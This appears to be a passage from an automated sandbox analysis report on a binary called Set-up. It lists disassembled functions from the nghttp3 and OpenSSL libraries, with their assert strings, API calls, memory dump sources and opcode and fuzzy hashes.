                                • Opcode Fuzzy Hash: eb9212d0c83990cddd6f8eaeb89ad63303e954e6fd16c7bcca5353419998a0d9
                                • Instruction Fuzzy Hash: 30119BB9A553165BDB207D648C41F2FB3989BA0714F15022DFD199B3C2EAA4DC2087F2
                                Function 001BC220 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 245COMMON
                                Download Yara Rule
                                APIs
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - pbuf->last) == len,nghttp3_qpack.c,00000978), ref: 001BC4E7
                                Strings
                                • (size_t)(p - pbuf->last) == len, xrefs: 001BC4E2
                                • nghttp3_qpack.c, xrefs: 001BC4DD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _assert
                                • String ID: (size_t)(p - pbuf->last) == len$nghttp3_qpack.c
                                • API String ID: 1222420520-3384106985
                                • Opcode ID: f6d7c60ef1ebcdcabd90c146323bcc0b0af0b8525a65f71d30a2ab8f66b3d9aa
                                • Instruction ID: 6b9539957a26bd9a2270b8f8f75e521c6f233686cefa999157af4b294ce050b3
                                • Opcode Fuzzy Hash: f6d7c60ef1ebcdcabd90c146323bcc0b0af0b8525a65f71d30a2ab8f66b3d9aa
                                • Instruction Fuzzy Hash: 3481C171A083009FD7089E2CC89076AB7D2AB99714F59867CE8998B3E2D735DC4887C1
                                Function 0029C950 Relevance: 5.4, APIs: 4, Instructions: 409COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7a3e4f79732f4f03d5c7eb3a3425ee62786d9e1b53039b8f6863c2d7f0731408
                                • Instruction ID: 7552d8c3df1a17eb1356240d9973131549f85ea866f42281fc7673890e8c8546
                                • Opcode Fuzzy Hash: 7a3e4f79732f4f03d5c7eb3a3425ee62786d9e1b53039b8f6863c2d7f0731408
                                • Instruction Fuzzy Hash: 6DD1E2B2518305BFDB04AF58DC41E6BBBA9EFC4344F49482CF94547222E671ED24CBA2
                                Function 001BC520 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151COMMON
                                Download Yara Rule
                                APIs
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - rbuf->last) == len,nghttp3_qpack.c,000004D0,?,?,?,?,?,?,001BB434,?,?,00000000,00000000,?,?), ref: 001BC68A
                                Strings
                                • (size_t)(p - rbuf->last) == len, xrefs: 001BC685
                                • nghttp3_qpack.c, xrefs: 001BC680
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _assert
                                • String ID: (size_t)(p - rbuf->last) == len$nghttp3_qpack.c
                                • API String ID: 1222420520-2159148421
                                • Opcode ID: 9f2bc6f76071b16a5a0087cab5953eacb3eeaedefad8bb39d09ba18642357a84
                                • Instruction ID: 4433eeb700a166e8940d7e57edac30dfd585c336cd87ff8cf94ad565c71cb01d
                                • Opcode Fuzzy Hash: 9f2bc6f76071b16a5a0087cab5953eacb3eeaedefad8bb39d09ba18642357a84
                                • Instruction Fuzzy Hash: E941F671B083005FD7099A28D890BAAB7D6EFD9314F18867DE989CB392EB35DD05C781
                                Function 001C2600 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151COMMON
                                Download Yara Rule
                                APIs
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len,nghttp3_qpack.c,00000EB7,?,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 001C27D1
                                Strings
                                • nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len, xrefs: 001C27CC
                                • nghttp3_qpack.c, xrefs: 001C27C7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _assert
                                • String ID: nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len$nghttp3_qpack.c
                                • API String ID: 1222420520-645767172
                                • Opcode ID: fff28e5b11fc6161205ab854c7625eedb40c586ce9de7dd1307153ac230abf1f
                                • Instruction ID: e485c349e001ccfb4e8b43cd10cbbc2b670aa17fadaa4c1e144314ae63fabac4
                                • Opcode Fuzzy Hash: fff28e5b11fc6161205ab854c7625eedb40c586ce9de7dd1307153ac230abf1f
                                • Instruction Fuzzy Hash: F351F775A043148FD7049F28D890B6AB7D6EFA8314F19467CEC999B382EB34DD05CB91
                                Function 003049A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 150COMMON
                                Download Yara Rule
                                APIs
                                • _time64.API-MS-WIN-CRT-TIME-L1-1-0(?,00000000,0018836A,?,?,0000012C,000000FF), ref: 003049BA
                                  • Part of subcall function 002C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C7262
                                  • Part of subcall function 002C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C7285
                                  • Part of subcall function 002C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C72C5
                                  • Part of subcall function 002C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C72E8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strcpystrlen$_time64
                                • String ID: OCSP_check_validity$crypto/ocsp/ocsp_cl.c
                                • API String ID: 3821555430-713967112
                                • Opcode ID: 1afe0beb284818ef164ccb4a1a2d9ce56f7c3292a5ea0f8ced2138a118c87296
                                • Instruction ID: 4d5ead89594e3f7a1d34311d96c2c96dd892edb61aaa5f2a419ce35c4cfa7fbd
                                • Opcode Fuzzy Hash: 1afe0beb284818ef164ccb4a1a2d9ce56f7c3292a5ea0f8ced2138a118c87296
                                • Instruction Fuzzy Hash: 8541D4B6F4830077DA107A65EC42F5B77558F94754F094138BE4C9B3C2E579FA208AA3
                                Function 001B45C0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMON
                                Download Yara Rule
                                APIs
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E,?,?,?,?,?,?,?), ref: 001B468C
                                Strings
                                • tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 001B4687
                                • nghttp3_conn.c, xrefs: 001B4682
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _assert
                                • String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
                                • API String ID: 1222420520-4133914617
                                • Opcode ID: 79648826609f92ba661cf045908f2cc1a6bb50040542562d5db215d3f7f7eef4
                                • Instruction ID: 375dd47a3b80f5f395d0772cec1b7a8186e111a4e6f6c0ac5958ca0fb0724ffe
                                • Opcode Fuzzy Hash: 79648826609f92ba661cf045908f2cc1a6bb50040542562d5db215d3f7f7eef4
                                • Instruction Fuzzy Hash: B531F0756002056FD610DE28EC85EEBB7E8EF96369F040629F958C3282EB31E814C7A1
                                Function 001B4400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON
                                Download Yara Rule
                                APIs
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E), ref: 001B44B7
                                Strings
                                • tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 001B44B2
                                • nghttp3_conn.c, xrefs: 001B44AD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _assert
                                • String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
                                • API String ID: 1222420520-4133914617
                                • Opcode ID: f1b73c6937a6faba4527f66395104906989c13da3a1f6a8205c1da8bf503d332
                                • Instruction ID: d26b96fea8f755d95de10b447dd0cf0d8172494599c18a73b7615e8fc95a2aba
                                • Opcode Fuzzy Hash: f1b73c6937a6faba4527f66395104906989c13da3a1f6a8205c1da8bf503d332
                                • Instruction Fuzzy Hash: 0221F276100605AFEB115F64DC01FE777DEAF96365F044468FA18C61A3EB3AD4248761
                                Function 0048A0C0 Relevance: 5.3, APIs: 4, Instructions: 327COMMON
                                Download Yara Rule
                                APIs
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 0048A161
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 0048A2D1
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 0048A3EC
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 0048A499
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID:
                                • API String ID: 3510742995-0
                                • Opcode ID: 6c7f82e55466ba9c5410bff703574377c473357d8b6ae2fa71727c8e075c28f9
                                • Instruction ID: 11f58f46cb195955a0226baa3bb966b325b731a60d6ced10a560bd721059910c
                                • Opcode Fuzzy Hash: 6c7f82e55466ba9c5410bff703574377c473357d8b6ae2fa71727c8e075c28f9
                                • Instruction Fuzzy Hash: 42C1A1716042009FDB04EF2CC888A1E7BA5BF89714F19496EFC498B356D7B5EC50CB8A
                                Function 001B6140 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON
                                Download Yara Rule
                                APIs
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i < len || offset == 0,nghttp3_stream.c,00000371,00000000,0018D7A7,?,?,0018D7A7), ref: 001B61CF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _assert
                                • String ID: i < len || offset == 0$nghttp3_stream.c
                                • API String ID: 1222420520-1528673747
                                • Opcode ID: e32c80ec8ec1beeca881f4df1d6ced64bd24fc753da3bae61469a30b11c8183c
                                • Instruction ID: d8b3bebb399f39664224c9fc04ae96c01b79773d1692606a4c281d42529a9a71
                                • Opcode Fuzzy Hash: e32c80ec8ec1beeca881f4df1d6ced64bd24fc753da3bae61469a30b11c8183c
                                • Instruction Fuzzy Hash: EE115EB55043048FD304EF28D898FE6B7E4EB98324F0904BDE949473A2D7346945CB91
                                Function 001B8700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON
                                Download Yara Rule
                                APIs
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((blklen & 0xfu) == 0,nghttp3_balloc.c,00000022,001B88D3,00000010,?,?,00000000,001B9AE3,001BACDD,-00000010,?,?,?,00000000,?), ref: 001B873C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _assert
                                • String ID: (blklen & 0xfu) == 0$nghttp3_balloc.c
                                • API String ID: 1222420520-1502420682
                                • Opcode ID: 17128e061bf63f1b9b8ea2b0735da0e24770955d1551ad9261ec933ac7813357
                                • Instruction ID: 32b074927b99f04f04a4cfc9a5acd5717f8b4fd411c8c64b4fdd5c37e4bf73e0
                                • Opcode Fuzzy Hash: 17128e061bf63f1b9b8ea2b0735da0e24770955d1551ad9261ec933ac7813357
                                • Instruction Fuzzy Hash: E211D6B5A09340AFC3129F14DC01B96BFB4AF52B18F1D8599E848AB2D3DB349C04C792
                                Function 001B89F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                                Download Yara Rule
                                APIs
                                • _byteswap_uint64.API-MS-WIN-CRT-UTILITY-L1-1-0(FFFFFF3F,?,nghttp3_conv.c,0000003D,nghttp3_get_varint,001B5084,?,?), ref: 001B8A31
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _byteswap_uint64
                                • String ID: nghttp3_conv.c$nghttp3_get_varint
                                • API String ID: 1624361598-912089391
                                • Opcode ID: fda592ee83d1d07d7914401739c538468767248c52d5b846e87f9dd7b94b8f3a
                                • Instruction ID: 47f2cc0c0e035626628d5fc9d4e4f0904409d7abca3d65f0880062ab5e16672d
                                • Opcode Fuzzy Hash: fda592ee83d1d07d7914401739c538468767248c52d5b846e87f9dd7b94b8f3a
                                • Instruction Fuzzy Hash: 18F0F6B151014297D7049F38D801928B7A2EB86712F48C2E5F094CA0C4CB7CC981E711
                                Function 001B0300 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON
                                Download Yara Rule
                                APIs
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(rcbuf->ref > 0,nghttp3_rcbuf.c,0000005E,001C0B2D,5308C483,00000000,001B4D9F,?,001B0EC8), ref: 001B0333
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
